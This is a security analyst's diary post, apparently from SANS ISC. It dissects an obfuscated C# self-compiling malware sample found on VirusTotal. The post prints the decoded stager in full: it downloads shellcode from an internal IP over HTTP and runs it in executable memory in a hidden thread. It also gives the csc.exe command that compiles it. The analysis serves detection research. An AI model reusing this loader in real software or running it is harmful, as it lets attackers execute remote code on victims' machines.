I found an interesting CSharp source code on VT a few days ago. Its score is only 3/59 (SHA256:5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a)[1].
It has been a long time since I saw payloads ready to be compiled. I did some research on self-compiling malware in 2020[2]. I think the file was uploaded on VT to verify the detection rate by AV vendors because the CobalStrike server is a private IP address. Or was it in the scope of some Red team exercise?
The code is obfuscated with junk characters that are removed during execution:
string pRVSczAKPboj = "u>(hs>(hi>(hn>(hg>(h [...payload removed...] >(h >(h0>(hx>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(h)>(h;>(h}>(h}>(h}".Replace(">(h", "");
Here is the decoded payload, which is easy to understand:
using System; using System.Net; using System.Runtime.InteropServices; namespace GnRiolRYuAcH { public class EpQmktOhiwXb { [DllImport ("kernel32")] private static extern UInt64 VirtualAlloc (UInt64 zJAjSroWZVkI, UInt64 KaWcaAtEjRML, UInt64 PRZMeuJQylhj, UInt64 lDLVdityOBmY); [DllImport ("kernel32")] private static extern IntPtr CreateThread (UInt64 NxVjPRlolSsT, UInt64 EZnBMZtLXzTZ, UInt64 mNXqHtnujBJm, IntPtr BVcXnWWYhroa, UInt64 rckVAtyTWXhW, ref UInt64 OUmSsFQyEEnY); [DllImport ("kernel32")] private static extern UInt64 WaitForSingleObject (IntPtr ucXgBIyufbdT, UInt64 nmJKJtodAzHm); [DllImport ("kernel32.dll\)] static extern IntPtr GetConsoleWindow (); [DllImport ("user32.dll")] static extern bool ShowWindow (IntPtr holpJgOYqcKG, int viaQwLWOkGFp); public static void Main () { ShowWindow (GetConsoleWindow (), 0); WebClient sbTBMGCfElPa = new System.Net.WebClient (); sbTBMGCfElPa.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)"); sbTBMGCfElPa.Headers.Add ("Accept", "*/*"); sbTBMGCfElPa.Headers.Add ("Accept-Language", "en-gb,en;q=0.5"); byte[] AjVmuebayNvb = null; AjVmuebayNvb = sbTBMGCfElPa.DownloadData ("hxxp://192[.]168[.]1[.]28:1234/Qm3k"); byte[] BlAVsJsniHyM = new byte[AjVmuebayNvb.Length - 0]; Array.Copy (AjVmuebayNvb, 0, BlAVsJsniHyM, 0, BlAVsJsniHyM.Length); UInt64 gltoUfDFqsfu = VirtualAlloc (0, (UInt64) BlAVsJsniHyM.Length, 0x1000, 0x40); Marshal.Copy (BlAVsJsniHyM, 0, (IntPtr) (gltoUfDFqsfu), BlAVsJsniHyM.Length); IntPtr wnvVIenBotAX = IntPtr.Zero; UInt64 DfVxARfvlcwx = 0; IntPtr YBKUjHKOUGUq = IntPtr.Zero; wnvVIenBotAX = CreateThread (0, 0, gltoUfDFqsfu, YBKUjHKOUGUq, 0, ref DfVxARfvlcwx); WaitForSingleObject (wnvVIenBotAX, 0xFFFFFFFF); } } }
The behavior is classic: Some READ_WRITE_EXECUTE (0x40) memory is allocated, and the payload returned by the HTTP request to the internal IP is injected and started in a new thread.
This can be compiled and executed on any Windows computer with a .Net framework installed (read: 99% of them!)
C:\Windows\Microsoft.NET\Framework\v4.0.30319>csc.exe /t:exe /out:payload.exe c:\users\rem\Desktop\pJmOrSymbiAM.cs
Indeed, all of you have a compiler installed on your computers, even if you’re not developers!
Usually, this kind of code is written in Powershell, but this technique looks stealthier. Or maybe not! I uploaded my compiled file to VT, which got a bad score of 36/72[4].
[1] https://www.virustotal.com/gui/file/5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a/detection
[2] https://www.sans.org/webcasts/atmic-talk-self-compiling-malware-114085/
[3] https://isc.sans.edu/diary/Finding+Metasploit+Cobalt+Strike+URLs/27204
[4] https://www.virustotal.com/gui/file/2bd26546e09eff4675d020dab3da4fc6cb08bad9637905ac792d16a4a8937bcf/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key